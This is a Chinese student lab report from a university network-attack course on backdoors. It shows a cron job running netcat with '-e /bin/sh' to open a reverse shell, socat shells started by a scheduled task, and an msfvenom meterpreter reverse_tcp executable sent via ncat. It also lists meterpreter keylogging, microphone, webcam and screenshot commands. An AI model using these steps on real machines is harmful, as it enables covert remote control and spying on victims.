标签:http 框架 执行 杀毒软件 溢出 扩展模块 环境 16进制 ddr
任务一:使用netcat获取主机操作Shell,cron启动
任务二:使用socat获取主机操作Shell, 任务计划启动
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
NC或netcat,在网络工具中有“瑞士军刀”美誉。
小巧精悍,下面是我对NC学习的内容。
-d 后台执行
-e prog 程序重定向
-g gateway 源路由跳数,最大值为8
-h 帮助信息
-i secs 延时的间隔
-l 监听模式
-n 指定IP地址
-o file 记录16进制的传输
-p 端口
(1)Windows获得Linux Shell
1.win监听5307端口

2.kali反弹连接

3.win获得shell

(2)Linux获得Win Shell
1.Kali监听5307端口
2.win反弹连接

3.Kali获得shell

(3)nc传输数据
1、 Windows下监听5205端口
2、 Kali下连接到Windows的5205端口
3、 建立连接之后,就可以传输数据了

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用。
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
这是cron运行命令的格式
#m h dom mon dow command
根据这个格式,我们将每小时的第8分钟运行反弹连接win的命令
05 * * * * /bin/netcat 192.168.0.105 5307 -e /bin/sh
下面是录屏gif

socat是ncat的增强版,它使用的格式是socat [options]
,其中两个address是必选项,而options 是可选项。
2.填写任务名称,并新建一个触发器

3.新建操作,端口设置为5307

4.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

5.在Kali环境下输入指令socat - tcp:192.168.62.1:5307
这样就获得了一个Shell
执行的命令是ipconfig查看ip,但是因为乱码,看的不是很清楚

1.在Kali上执行指令生成后门文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.132 LPORT=5307-f exe > 20175307_backdoor.exe
Lhost是Kali的IP地址,Lport为端口

2.通过ncat进行传输
(1)Win10 cmd键入
ncat.exe -l 5307 >20175307_backdoor.exe
准备接收文件
(2)Kali键入
nc 192.168.0.105 5307 < 20175307_backdoor.exe
传输文件
结果被360查杀了

(3)360恢复后门文件

3.msf控制台,设置监听

4.运行后门文件,kali获得shell

1.录音
record_mic
加上-d 5表示录音5秒

webcam_snap
指令可以使用摄像头进行拍照。
但是Win7虚拟机没摄像头,所以失败了
keyscan_start
指令开始记录下击键的过程,使用
keyscan_dump
指令读取击键的记录
keyscan_stop
表示停止记录键盘

screenshot
指令可以进行截屏


在某些下载网站下载破解版软件的时候,会要求先下载一个专用下载器,并要求添加信任,这个时候点击下载器,可能会执行绑定的后门文件。
本人玩游戏,打不过会通过某些同学要到外挂,比如单板透视,本身是一个壳,会要求360添加信任,在执行外挂的同时,极有可能就执行了后门文件。
自动项,修改注册表,crontab,任务计划程序
主机植入后门之后,可以控制主机,通过键盘记录可以轻松获取账户和密码。
查看注册表,启动项,杀毒软件,防火墙
2019-2020-2 20175307高士淳《网络对抗技术》Exp2 后门原理与实践
标签:http 框架 执行 杀毒软件 溢出 扩展模块 环境 16进制 ddr
原文地址:https://www.cnblogs.com/gsc20175307/p/12525200.html